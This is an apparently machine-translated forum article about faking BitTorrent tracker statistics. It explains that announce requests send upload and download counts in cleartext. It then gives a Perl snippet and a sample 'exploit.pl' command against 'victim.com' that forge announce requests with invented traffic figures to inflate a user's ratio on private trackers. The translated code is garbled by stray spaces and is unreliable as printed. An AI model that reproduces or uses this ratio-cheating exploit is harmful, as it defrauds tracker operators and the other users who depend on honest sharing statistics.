13:52 Vulnerability in the bittorrent protocol | |
| Before you read this article would recommend to get acquainted with the basic terms of the technology http://ru.wikipedia.org/wiki/BitTorrent also desirable basic knowledge of the language Perl Today Bittorrent protocol is at its peak of popularity. Hundreds and thousands of terabytes per second rushing to peers over fiber optic backbones and radio channels. Millions of files (torrent) appear on the tracker. What can prevent this? In this article I want to discuss and show excessive openness and ease of messaging tracker and bittorrent client. Maybe this vulnerability can not be named because real threat to the server and the client does not, but it can undermine the functioning of the network and dramatically reduce the overall rate of return. It's no secret that an indicator of user activity tracker is a ratio. It is less than the greater restrictions imposed on the user. Very low ratio may serve as deleting the account. This is especially important in networks using NAT, because Upload turns miserable. Let's try to delve into the mechanism of communications client-server and try to improve the ratio. Actually I want to start a description of parsing HTTP header most Bittorrent clients (for detailed description refer to the relevant documentation): GET announce.php? Info_hash =% 8bz% 0d% 9b% 93% ac% 7d% d0 % 90% 60r% 03% 1b% 2b% 89% 60p% 08% 96% 2e & peer_id =- UT1600-% da% 81% bc% ce4% 9c% a0% c1k% 81% a7% f9 & port = 6881 & uploaded = 35302368 & downloaded = 54454366434 & left = 177313792 & key = F53CB1E7 & numwant = 200 & compact = 1 & no_peer_id = 1 HTTP/1.1 Host: myhost.com User-Agent: uTorrent/1600 Accept-Encoding: gzip Connection: Close As you can see all the key parameters are passed in cleartext, and it can be used. Substituting the parameters in the header (getting variables everyone can realize its own way, whether it be console or GUI) and transferring it to an open tracker with Socket, following the conversion of a hash file to the tracker understandable form: my @ r = $ info_hash = ~ / (. {1,2}) / g; $ info = join ('%',r); $ info_hash = "%". $ Info; my $ request = ""; $ request .= "GET / announce.php? Passkey = $ passkey & info_hash = $ info_hash & peer_id =- UT1750-% fa% 91% a4IE% 22ys% fb % 3cCc & port = 6881 & uploaded = $ uploaded & downloaded = $ downloaded & left = 1037668352 & key = E4DC5ED5 & event = started & numwant = 200 & compact = 1 & no_peer_id = 1 HTTP/1.1 \ r \ n "; $ request .=" Host: $ host: $ port \ r \ n "; $ request .=" User-Agent: uTorrent/1750 \ r \ n "; $ request .=" Accept-Encoding: gzip \ r \ n "; $ request .= "Connection: Close \ r \ n \ r \ n"; print $ sock $ request; print $ sock $ request; Check the profile and are pleased to be received megabytes:) Example: perl exploit.pl perl exploit.pl victim.com 80 1ea9a2766ce3323b3985fddf4a4d11fb 10551598080 0 7E4067D35AE85FF20BFB9D08DCA0E688980CEFB8 This article is for information only and use of this material may result in termination of your account . I would like to hear opinions on this issue and certainly the way to solve it. I am aware of some anti-cheat devices, but it seems to me they are not effective. Popovodu design not much kick as Habraviki closed. Shortcuts on the topic: http://www.securitylab.ru/news/301042.ph ... http://ru.wikipedia.org/wiki/BitTorrent | |
|
| |
| Total comments: 9 | ||||||||||
| ||||||||||
